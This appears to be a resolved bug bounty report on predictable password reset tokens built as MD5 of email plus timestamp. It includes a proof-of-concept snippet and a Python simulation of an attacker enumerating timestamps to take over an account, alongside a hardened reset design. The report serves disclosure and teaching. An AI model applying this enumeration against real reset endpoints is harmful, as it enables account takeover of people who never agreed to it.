Auth Bypass Private Program 2025-03-01
Predictable Password Reset Token
Severity: Critical | Status: Resolved
Summary
Password reset tokens were MD5 hashes of (email + timestamp). Both inputs are known or guessable by an attacker (the victim's email address and the approximate time of the reset request), so the token carried no secret entropy and could be predicted, enabling account takeover.
Proof of Concept
import hashlib

email = "victim@example.com"   # target account (placeholder value)
timestamp = 1740787200         # reset request time as epoch seconds (assumed encoding; the precision the vendor used is not stated here)
token = hashlib.md5(f"{email}{timestamp}".encode()).hexdigest()
# Generated token matches the token in the actual reset link
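The following is an added worked example, not code from the original report or the vendor. It models the reported scheme end to end: a hypothetical reset service that issues MD5(email + timestamp) tokens, an attacker who never sees the token but enumerates candidate timestamps around the moment the reset was triggered and submits each one, and beside it a hardened service that issues a random token from the OS CSPRNG, stores only its SHA-256 digest, compares in constant time, expires it and makes it single use. The service classes, the email address, the timestamps and the assumption that the timestamp is whole epoch seconds are all constructed for the example.

```python
import hashlib
import hmac
import secrets
from typing import Dict, List, Optional, Tuple


# --- Vulnerable scheme as described in the report: MD5(email + timestamp) ---

def weak_reset_token(email: str, timestamp: int) -> str:
    """Reproduces the reported derivation. Timestamp assumed to be epoch seconds
    (the report does not state the precision the vendor used)."""
    return hashlib.md5(f"{email}{timestamp}".encode()).hexdigest()


class WeakResetService:
    """Hypothetical stand-in for the vendor's reset endpoint (constructed here)."""

    def __init__(self) -> None:
        self._tokens: Dict[str, str] = {}  # token -> email

    def request_reset(self, email: str, now: int) -> None:
        # The token is only mailed to the account owner; the attacker never sees it.
        self._tokens[weak_reset_token(email, now)] = email

    def redeem(self, token: str) -> Optional[str]:
        # Returns the account the token unlocks, or None if the token is unknown.
        return self._tokens.get(token)


def candidate_tokens(email: str, approx_ts: int, window: int) -> List[str]:
    """Attacker side: every token the scheme could have produced if the reset
    was processed within +/- window seconds of approx_ts."""
    return [weak_reset_token(email, ts)
            for ts in range(approx_ts - window, approx_ts + window + 1)]


def takeover(service: WeakResetService, email: str, approx_ts: int, window: int) -> Optional[str]:
    """Submit each candidate to the endpoint until one is accepted.
    Returns the accepted token, or None if none matched in the window."""
    for token in candidate_tokens(email, approx_ts, window):
        if service.redeem(token) == email:
            return token
    return None


# --- Hardened scheme: random token, hashed at rest, constant-time compare, expiry, single use ---

class SecureResetService:
    TTL_SECONDS = 15 * 60

    def __init__(self) -> None:
        self._tokens: Dict[str, Tuple[str, int]] = {}  # sha256(token) -> (email, expires_at)

    def request_reset(self, email: str, now: int) -> str:
        token = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG; nothing to predict
        digest = hashlib.sha256(token.encode()).hexdigest()
        self._tokens[digest] = (email, now + self.TTL_SECONDS)
        return token  # sent only to the account's mailbox; never stored in clear

    def redeem(self, token: str, now: int) -> Optional[str]:
        digest = hashlib.sha256(token.encode()).hexdigest()
        matched = None
        for stored_digest, (email, expires_at) in self._tokens.items():
            if hmac.compare_digest(stored_digest, digest) and now <= expires_at:
                matched = (stored_digest, email)
                break
        if matched is None:
            return None
        del self._tokens[matched[0]]  # single use
        return matched[1]


if __name__ == "__main__":
    victim = "victim@example.com"  # constructed sample input
    triggered_at = 1_740_787_200   # constructed: when the attacker requested the reset
    weak = WeakResetService()
    # Server-side latency and clock skew: the attacker only knows the time approximately.
    weak.request_reset(victim, triggered_at + 37)
    print("weak scheme, token accepted:", takeover(weak, victim, triggered_at, window=120))

    secure = SecureResetService()
    real = secure.request_reset(victim, triggered_at)
    print("secure scheme, real token accepted:", secure.redeem(real, triggered_at + 60) == victim)
```

With one-second timestamps and a two-minute uncertainty window the attacker needs at most 241 submissions, which is why rate limiting alone is not a fix: the token itself must be unpredictable, and the hardened service above keeps the attacker from ever having a candidate list to try.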
Impact
Account takeover of any user whose email address is known: the attacker requests a reset for the victim, computes MD5(email + timestamp) for every timestamp around the moment of the request, and submits the candidates until one is accepted. No interaction with the victim and no access to their mailbox is required.
Responsible Disclosure
This vulnerability was reported responsibly and fixed by the vendor before public disclosure.